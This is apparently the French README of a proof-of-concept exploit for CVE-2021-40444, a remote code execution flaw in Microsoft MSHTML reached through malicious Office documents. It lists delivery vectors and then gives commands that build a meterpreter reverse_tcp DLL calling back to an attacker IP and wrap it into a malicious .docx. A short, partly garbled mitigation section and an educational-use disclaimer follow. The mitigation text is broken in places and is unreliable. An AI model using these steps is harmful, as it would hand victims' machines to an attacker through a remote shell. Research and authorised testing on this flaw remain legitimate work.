
Preuve de concept d'exploitation pour CVE-2021-40444, une vulnérabilité d'exécution de code à distance dans Microsoft Office déclenchée via des contrôles ActiveX malveillants dans des documents hébergés sur le web.
CVE-2021-40444 est une vulnérabilité d'exécution de code à distance (RCE) affectant Microsoft MSHTML, exploitée par le biais de documents Microsoft Office malveillants.
La vulnérabilité permet à un attaquant d'exécuter du code arbitraire sur le système cible en incitant une victime à ouvrir un document Office spécialement conçu. L'exploitation repose sur l'utilisation de fichiers .cab ou .docx malveillants contenant des contrôles ActiveX, qui chargent une DLL distante via le moteur MSHTML.
| Vecteur | Description |
|---|
| Pièce jointe malveillante | Document Office envoyé par courrier électronique contenant un script d'exploitation |
| Partage réseau | Fichier hébergé sur un partage SMB ou WebDAV compromis |
| Courrier électronique | L'utilisateur ouvre une pièce jointe ou clique sur un lien menant au document malveillant |
Microsoft a publié un correctif dans le cadre de sa mise à jour de sécurité de septembre 2021. Il est fortement recommandé d'appliquer les mises à jour de sécurité dès que possible.
.cab en pièce jointe via les stratégies de messagerie.D4F6B3D7-3E6C-4E8A-9B8C-1E0E1A2B3C4D pour bloquer le chargement de DLL non signées.# Génération d'un document malveillant à l'aide d'outils d'exploitation
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o evil.dll
python3 exploit.py -d evil.dll -o exploit.docx
Avertissement : Cet outil est fourni à des fins éducatives et de test d'intrusion autorisé uniquement. L'auteur décline toute responsabilité en cas d'utilisation abusive.
MIT